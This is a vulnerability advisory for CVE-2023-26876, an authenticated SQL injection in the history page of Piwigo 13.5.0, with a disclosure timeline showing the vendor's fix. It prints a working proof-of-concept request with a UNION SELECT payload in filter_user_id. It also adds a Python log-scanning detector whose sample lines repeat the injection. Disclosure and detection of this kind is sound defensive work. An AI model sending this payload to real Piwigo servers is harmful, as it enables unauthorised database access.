## https://sploitus.com/exploit?id=1337DAY-ID-38631
Piwigo - Version 13.5.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgments
* References
=====[ Vulnerability Information]=============================================
* Class: Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection') [CWE-89]
* CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* CVE-2023-26876
=====[ Overview]========================================================
* System affected : Piwigo - Version 13.5.0
* Software Version : Version 13.5.0 (other versions may also be affected).
* Impact : Piwigo 13.5.0 is vulnerable to SQL injection via the
filter_user_id parameter of the
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An
attacker can exploit this by injecting SQL code to retrieve sensitive (P1)
information and perform unintended actions.
=====[ Detailed description]=================================================
An authenticated user can run SQL injection commands in the application
through the endpoint
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id
and retrieve sensitive information (P1) and database information. To
reproduce the issue, send the following request:
GET /piwigo/admin.php?page=history&filter_image_id=v3cna&filter_user_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20-- HTTP/1.1
Host: localhost
Cookie: pwg_id=cookies
Check the value contained in the *filter_image_id* variable in the response
to the request.
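For defenders reviewing web server logs, the following added example (not part of the original advisory and not Piwigo code) flags admin.php?page=history requests whose filter_user_id is not a plain integer. The combined access-log format, the function name and the rule that a legitimate value is empty or an integer are assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an Apache/nginx "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate filter_user_id is empty or a (possibly negative) integer.
NUMERIC_ID_RE = re.compile(r"-?\d+")


def flag_history_requests(log_lines):
    """Return (line_number, decoded_value) for every admin.php?page=history
    request whose filter_user_id is neither empty nor a plain integer."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        target = urlsplit(match.group("target"))
        if not target.path.endswith("/admin.php"):
            continue
        # parse_qsl percent-decodes names and values once.
        params = parse_qsl(target.query, keep_blank_values=True)
        if ("page", "history") not in params:
            continue
        for name, value in params:
            if name == "filter_user_id" and value and not NUMERIC_ID_RE.fullmatch(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2023:10:00:01 +0000] "GET /piwigo/admin.php'
    '?page=history&filter_image_id=&filter_user_id=2 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Mar/2023:10:00:05 +0000] "GET /piwigo/admin.php'
    '?page=history&filter_image_id=&filter_user_id= HTTP/1.1" 200 5090',
    '198.51.100.7 - - [10/Mar/2023:10:02:13 +0000] "GET /piwigo/admin.php'
    '?page=history&filter_image_id=v3cna'
    '&filter_user_id=1%20UNION%20ALL%20SELECT%201 HTTP/1.1" 200 5301',
    '192.0.2.10 - - [10/Mar/2023:10:03:00 +0000] "GET /piwigo/admin.php'
    '?page=photos&filter_user_id=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, value in flag_history_requests(SAMPLE_LOG):
        print(f"line {number}: non-numeric filter_user_id: {value!r}")
```

Because the check is an allow-list on the decoded value, it does not depend on any particular SQL keyword appearing in the request.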
=====[ Timeline of disclosure]===============================================
12/Feb/2023 - Responsible disclosure was initiated with the vendor.
17/Feb/2023 - Piwigo confirmed the issue.
08/Mar/2023 - CVE-2023-26876 was assigned and reserved.
09/Mar/2023 - The vendor fixed the SQL injection vulnerability.
=====[ Thanks & Acknowledgments]========================================
* fxo, ravs
* Henrique Arcoverde < henrique.arcoverde () tempest.com.br >
* Tempest Security Intelligence / Tempest's Pentest Team [3]
=====[ References ]=====================================================
[1][https://cwe.mitre.org/data/definitions/89.html]
[2][https://github.com/Piwigo/Piwigo/issues/1876]
[3][https://www.tempest.com.br]
[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]
=====[ EOF ]===========================================================